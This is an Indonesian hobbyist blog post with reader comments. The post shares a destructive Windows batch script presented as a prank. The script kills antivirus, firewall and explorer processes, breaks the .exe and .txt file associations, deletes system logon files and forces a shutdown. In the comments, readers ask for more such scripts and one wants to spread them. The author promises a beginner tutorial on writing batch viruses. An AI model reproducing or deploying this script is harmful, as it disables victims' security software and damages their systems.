MorphostLab

Tempat nongkrongnya Morphic dan kawan-kawan

Script Cabe Rawit yang bikin jahil

Posted by Morphic pada April 29, 2009


virus_skullsebelumnya aku minta izin ama temanku shafry karena udah minjam script dia untuk bikin artikel…

he he he he
neh script yang dimaksud…

@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown -s -t 5 -c “thank you for waiting”

by: Morphic

thanks to: all readers

15 Tanggapan to “Script Cabe Rawit yang bikin jahil”

  1. joni said

    jelasi lebih detail dong

  2. keep said

    hahahahaha gue pengen nyebar script yang bisa bikin pc komp lo semua goyang2,hahahahahahahah
    tapi sabar yahhhhhhhhh

  3. bukandewa said

    cukup ganti yang ini aaja
    assoc .exe=txtfile
    assoc .txt=mp3file
    jadi ini
    assoc .exe=exefile
    assoc .txt=txtfile

    udah beres…terlalu mudah…

  4. udin said

    tai….

  5. udin said

    script murahan,,,,,,,,
    itu sih mainan buat anak sd…..

  6. Kholis Virologist said

    weh pasti kalau njalanin tuh script langsung mati dalam 5 detik
    sepertinya gitu

    • Morphic said

      kalo script-nya vbs.
      matiin wscript.exe si virus bakal mati ditempat…
      gak usah tunggu-tunggu lagi…

      kalo “bat” susah nyari pemicunya biar aktif slamanya…

      kyknya kholis dah banyak tahu soal virus ya…

  7. Andre said

    Saya newbie… eh script diatas bisa ditulis di notepad gak??? (ekstensi .vbs)

    Slam kenal punya YM? FB?

  8. oxxy said

    minta script lain lagi donk! *_*

    • Morphic said

      oke.. sering-sering datang ke MorphostLab…

      ntar aku mau posting tentang pemrograman virus Batch untuk pemula loh…

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: